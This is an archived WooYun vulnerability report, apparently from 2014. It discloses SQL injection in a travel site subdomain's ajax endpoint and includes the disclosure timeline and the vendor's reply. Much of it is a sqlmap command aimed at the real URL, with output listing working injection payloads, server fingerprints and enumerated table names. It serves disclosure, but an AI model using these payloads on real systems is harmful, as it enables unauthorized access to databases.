乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-02: 细节已通知厂商并且等待厂商处理中 2014-03-03: 厂商已经确认,细节仅向厂商公开 2014-03-13: 细节向核心白帽子及相关领域专家公开 2014-03-23: 细节向普通白帽子公开 2014-04-02: 细节向实习白帽子公开 2014-04-16: 细节向公众公开
重新检测了所有分站,找到一处分站的SQL注射
漏洞位置:http://dazhe.byecity.com/ajax/ajaxurl.aspx参数province没有过滤,导致注射
C:\Users\Administrator>sqlmap.py -u "http://dazhe.byecity.com/ajax/ajaxurl.aspx?action=city&province=12" -p province --tables
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:---Place: GETParameter: province Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=city&province=12 AND 5069=5069 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: action=city&province=12 AND 6452=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(100)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (6452=6452) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(111)+CHAR(107)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: action=city&province=12 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(100)+CHAR(99)+CHAR(113)+CHAR(84)+CHAR(86)+CHAR(100)+CHAR(109)+CHAR(75)+CHAR(105)+CHAR(78)+CHAR(97)+CHAR(118)+CHAR(115)+CHAR(113)+CHAR(119)+CHAR(111)+CHAR(107)+CHAR(113),NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: action=city&province=12; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: action=city&province=12 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: action=city&province=(SELECT CHAR(113)+CHAR(103)+CHAR(100)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (7564=7564) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(111)+CHAR(107)+CHAR(113))---web server operating system: Windows Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: Information[56 tables]+---------------------------------------------------+| SiteSystem.Articles || SiteSystem.Entertainment || SiteSystem.Hotel || SiteSystem.Restaurant || SiteSystem.ShoppingMall || SiteSystem.Sight || SiteSystem.Themes || SiteSystem.Traffic || SiteSystem.TypeSummary || bosssystem.ContentModules || bosssystem.ContentModules || bosssystem.Modules || dbdatareader.Articles || dbdatareader.CommonIdentity |
PS:一般这种显错注射可导致【所有数据库信息】瞬间泄露的,rank一般在10以上(高危)
危害等级:低
漏洞Rank:1
确认时间:2014-03-03 09:28
非常感谢 我的QQ。一起处理下公司的安全问题。有奖哦!
暂无